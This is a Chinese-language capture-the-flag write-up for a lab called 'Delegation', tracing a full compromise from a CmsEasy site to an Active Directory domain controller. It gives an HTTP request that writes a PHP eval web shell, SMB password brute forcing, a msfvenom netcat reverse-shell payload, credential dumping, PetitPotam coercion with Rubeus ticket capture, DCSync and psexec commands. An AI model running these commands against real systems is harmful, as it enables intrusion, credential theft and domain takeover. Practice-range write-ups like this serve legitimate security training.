春秋云境-Delegation - WP

内网渗透
81

fscan扫描

39.99.159.97:3306 open
39.99.159.97:80 open
39.99.159.97:21 open
39.99.159.97:22 open

80端口是个CmsEasy 7_7_5_20210919_UTF8

后台弱口令 admin 123456

该版本存在任意文件写入

POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.99.159.97
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=0584gim8624f3gjc417is5vsd5; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
​
sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php eval($_REQUEST[1]);phpinfo();?>

suid提权拿到第一个flag

image-20231011010106666

给了一个提示

Here is the hint: WIN19\Adrian
I'll do whatever I can to rock you...

上fscan开扫

172.22.4.7  DC01.xiaorang.lab
172.22.4.19 FILESERVER.xiaorang.lab
172.22.4.36(已拿下)
172.22.4.45 XIAORANG\WIN19

尝试爆破Adrian用户

➜ proxychains4 -q cme smb 172.22.4.45 -d WIN19 -u Adrian -p rockyou.txt

爆出

WIN19\Adrian:babygirl1

image-20231011011150046

直接rdp过去

桌面有个PrivescCheck,还有个结果html文件 非常的贴心

image-20231011011952223

image-20231011011932044

当前用户对HKLM\SYSTEM\CurrentControlSet\Services\gupdate 注册表项具有写权限,并且用户可以启动和停止gpupdate服务

修改ImagePath,然后启动服务

image-20231011012502449

image-20231011012540199

但是不知道为啥没弹上

尝试弹到本地

msfvenom -p windows/x64/exec cmd='C:\temp\nc64.exe 127.0.0.1 2333 -e cmd.exe' --platform windows -f exe-service > a.exe

image-20231011020836250

image-20231011021123735

得到第2个flag

抓hash

load kiwi
creds_all

image-20231011021451779

得到机器账户hash

proxychains4 -q findDelegation.py xiaorang.lab/'WIN19$' -hashes :d131def22fd09c35b544caa6068f5d5f  -dc-ip 172.22.4.7

image-20231011021656285

配置了非约束委派

开Rubeus每秒收割一次票据

Rubeus.exe monitor /interval:1 /filteruser:DC01$

可以使用SpoolSample活PetitPotam或DFSCoerce让域控强制进行身份验证

proxychains4 python3 PetitPotam.py -u 'WIN19$' -hashes :d131def22fd09c35b544caa6068f5d5f -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab DC01.xiaorang.lab

(别忘了改/etc/hosts)

image-20231011023600133

此时Rubeus就收到了TGT

image-20231011023659053

解码后mimikatz加载票据 然后dcsync da

kerberos::ptt ticket.kirbi
​
lsadump::dcsync /domain:xiaorang.lab /user:administrator

image-20231011024733399

psexec横到剩下两台没拿下的机器拿下最后两个flag

image-20231011024904344